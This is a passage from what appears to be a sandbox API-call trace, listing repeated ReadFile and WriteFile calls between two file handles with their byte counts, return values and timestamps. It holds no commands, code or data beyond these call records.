WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.062] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.063] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.063] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x11f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.064] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.064] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.065] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.065] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.066] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.066] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.067] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.067] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2de, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.068] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.068] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.069] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.069] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.072] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.073] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.073] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.074] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.074] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.075] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ca, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.076] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.076] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.077] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.077] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.078] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.078] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.079] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.079] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.081] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.082] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.082] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x119, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.083] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.083] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.084] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3cd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.084] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.085] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.085] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.086] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.086] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.087] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.087] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.088] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.088] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.089] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.089] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.090] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.091] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.091] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.092] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.092] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.093] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.093] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.094] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.094] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x9f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.095] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.095] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.096] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.096] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.097] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.097] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x298, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.098] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.098] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.099] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.099] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x298, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.100] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.100] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.101] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.101] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.102] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.102] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x23f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.102] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.103] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x327, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.103] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.104] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.104] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.105] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x244, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.105] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.106] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x273, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.106] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.107] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ae, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.107] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.108] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.108] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.109] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.109] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.110] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x354, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.110] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.116] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.116] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.117] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.117] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.118] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.118] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3cf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.120] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.121] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ad, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.121] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.122] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x398, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.122] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, 